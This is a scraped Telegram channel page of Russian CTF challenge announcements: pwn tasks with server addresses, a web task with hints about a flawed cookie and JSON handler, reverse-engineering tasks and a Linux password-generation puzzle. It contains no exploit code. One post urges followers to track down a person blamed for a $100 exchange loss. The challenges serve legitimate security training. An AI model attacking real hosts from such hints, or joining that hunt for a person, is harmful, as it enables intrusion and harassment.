t.me/writeup_ctf/544
WR
Райтапы по CTF{2025}
1 671 подписчик
1
task.c
3.03.2025, 19:55
t.me/writeup_ctf/543
WR
Райтапы по CTF{2025}
1 671 подписчик
10
3
336
#linuxadministration
Linuх для PROдвинутых 4

Представь себе, что ты оказался в ситуации, когда интернет, как назло, подводит, и ты не можешь воспользоваться привычным сервисом для генерации паролей. Но не стоит отчаиваться! В мире Linux есть волшебные команды, способные создать надежный пароль всего за одно мгновение.

Твоя задача – написать команду, которая сгенерирует пароль длиной 30 символов, включающий в себя сочетание латинских букв верхнего и нижнего регистра, цифр и специальных символов, при этом:

• Использовать весь алфавит в каждом наборе символов при генерации пароля необязательно.
• Выводить строго 30 символов не обязательно, допустимо, если их будет немного больше.
• Допускается, что команда может не всегда выдавать результат, подходящий под условие (например, иногда при генерации в пароле могут отсутствовать спецсимволы).
• Необходимо выполнить задание одной командой, без использования пайпов и символа ';'. Программирование также не допускается. Давай учиться делать это правильно и изящно!
• Доступ в интернет отсутствует, но если на твоем дистрибутиве Linux предустановлена подходящая утилита, ее использование будет вполне уместным.

Присылайте решение @Max_RSC, он предоставит флаг, который затем нужно будет сдать боту @writeup_ctf_bot

Благодарим @CyberFazaN за корректировки, внесенные в условие задачи, и помощь.
28.02.2025, 14:34
t.me/writeup_ctf/542
WR
Райтапы по CTF{2025}
1 671 подписчик
6
4
1.2 k
#web
Админы-параноики 👀

https://sashukkeshuk.ru

Жил-был администратор заурядного блога, наслаждаясь миром и спокойствием. Но вскоре настали времена лихие: злоумышленники, как тени, начали преследовать его, крадя данные пользователей и творя злодеяния от его имени в поисках некоего флага. Бедный админ, терзаемый страхом и смятением, долгое время пытался сам защитить свой сайт, но все его усилия были тщетны. В конце концов, отчаявшись, решил он обратиться за помощью к фрилансеру, дабы тот обеспечил надежную защиту его сайта и учетной записи. И вот, вздохнув с облегчением, администратор уверовал, что сайт теперь уже никто не взломает и его аккаунт в полной безопасности! Или все же нет?...

Формат флага: flag{...}

Хинт 1: Говорят, что фрилансер, работая над сайтом, допустил небольшую, едва заметную ошибку при отправке ответной странички. Однако именно она кардинально повлияла на безопасность сайта, ведь стала заметна другая, куда большая.

Также ходят слухи, что фрилансер не знает, что такое JSON, и, следовательно, не был осведомлен о функциях, которые с ним работают...

Хинт 2: Фрилансер славился своей любовью использовать кастомные куки для аналитики на бэкенде, чтобы приветствовать пользователей, при этом логику работы любил он писать именно сам, ведь полагаться везде только на либы – это удел слабаков! Но он и представить себе не мог, чем все это обернулось, что стало возможным заметить...

Автор: @Sashuk_keshuk

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
24.02.2025, 22:49
t.me/writeup_ctf/541
WR
Райтапы по CTF{2025}
1 671 подписчик
3
3
1.0 k
#pwn
write-to-rce-2-40 💻

Не нажимай меня!

45.12.114.80:32003

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
23.02.2025, 18:05
t.me/writeup_ctf/540
WR
Райтапы по CTF{2025}
1 671 подписчик
13
5
439
Ребят, есть одна тема, нужно найти злодея, давайте делать расследование
Из-за него я потерял 100 долларов на бирже!!!

https://t.me/bazabazon/35218
23.02.2025, 00:04
t.me/writeup_ctf/539
WR
Райтапы по CTF{2025}
1 671 подписчик
4
1
888
#pwn
rock-n-rollback 🪓

Теперь нет необходимости запоминать указатели и вызывать free!

45.12.114.80:32002

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
22.02.2025, 18:06
t.me/writeup_ctf/538
WR
Райтапы по CTF{2025}
1 671 подписчик
4
2
960
#pwn
undefined-pointer🧑‍💻

Один Дед на курсах программирования всегда подчеркивал важность инициализации переменных при их объявлении. Думаю, ничего страшного не произойдет, если я сделаю это позже.

45.12.114.80:32000

Автор: @s41nt0l3xus

После получения шелла, помимо флага, можно забрать с сервера и intended решение в виде скрипта.

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
21.02.2025, 18:07
t.me/writeup_ctf/537
WR
Райтапы по CTF{2025}
1 671 подписчик
10
3
1.1 k
Ура, ура, ура! Долгожданный незаезженный PWN!

#pwn
chemistry-teacher👨🏻‍🔬

Мой учитель химии побрился налысо, отрастил бороду, надел шляпу и начал очень странно разговаривать...

45.12.114.80:32001

Автор: @s41nt0l3xus

Зеркало тасков

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot

#таск@writeup_ctf

💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube
20.02.2025, 19:11
t.me/writeup_ctf/536
WR
Райтапы по CTF{2025}
1 671 подписчик
5
7
642
#reverse
Матрешка для реверсера

Мой друг создал это приложение пять лет назад, но, к сожалению, он не помнит, какой был флаг. Можешь помочь ему в его поисках?

Формат флага: KFCctf{}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
20.02.2025, 16:30
t.me/writeup_ctf/535
WR
Райтапы по CTF{2025}
1 671 подписчик
16
5
437
@s41nt0l3xus тут предложил незаезжанный PWN (который очень знаю ждали):

Есть, на мой взгляд, незаезженные CTF таски в жанре PWN по типу этой https://ctfd.miptlovectf.ru/challenges#rock-n-rollback-9

А ещё с https://ctfd.miptlovectf.ru у него готовы сплойты решений и контейнеры. Пока он их на своём сервачке развернул

Хотите?
Если да, то ставьте сердечки и мы их добавим в бота 😎
19.02.2025, 20:19
t.me/writeup_ctf/534
WR
Райтапы по CTF{2025}
1 671 подписчик
6
4
468
Бездушную машину научили принимать оценку заданий! 🌟👍

Подчеркнём, что оценка должна относиться именно к качеству и увлекательности контента. Поскольку объективно оценить такие характеристики, как сложность, невозможно.

В этой ситуации можно ориентироваться только на то, сколько решений было принято. 📊

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
19.02.2025, 18:41
t.me/writeup_ctf/533
WR
Райтапы по CTF{2025}
1 671 подписчик
5
1
639
#reverse
Андроид

Формат флага: KFCctf{}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
19.02.2025, 15:17
t.me/writeup_ctf/532
WR
Райтапы по CTF{2025}
1 671 подписчик
6
642
#reverse
Флапиберд-флагоберд

Формат флага: KFCctf{}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
19.02.2025, 15:08
t.me/writeup_ctf/531
WR
Райтапы по CTF{2025}
1 671 подписчик
5
649
#reverse
Посылка 2

Кто-то все-таки сумел обезвредить бомбу, но это еще не конец. Внутри находилась еще одна посылка, и в ней уже система посложнее :)

Формат флага: KFCctfBIGFLAG{...}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
19.02.2025, 15:05
t.me/writeup_ctf/530
WR
Райтапы по CTF{2025}
1 671 подписчик
3
654
#reverse
.exe c торрента

Я скачал dnSpy с торрента, и вместе с ним загрузился этот интересный экзешник. Можешь помочь разобраться с ним?

Формат флага: KFCctf{...}

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
19.02.2025, 15:02
t.me/writeup_ctf/529
WR
Райтапы по CTF{2025}
1 671 подписчик
4
1
678
#reverse
Посылка

Вчера в отделение почты в городе N поступила эта посылка, вызывали саперов реверсеров, но они не смогли помочь. Вся надежда на тебя!

Автор: @while_not_False

Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot
19.02.2025, 14:58
t.me/writeup_ctf/528
Результаты поиска ограничены до 100 публикаций.
Некоторые возможности доступны только премиум пользователям.
Необходимо оплатить подписку, чтобы пользоваться этим функционалом.
Фильтр
Тип публикаций
Хронология похожих публикаций:
Сначала новые
Похожие публикации не найдены
Сообщения
Найти похожие аватары
Каналы 0
Высокий
Название
Подписчики
По вашему запросу ничего не подошло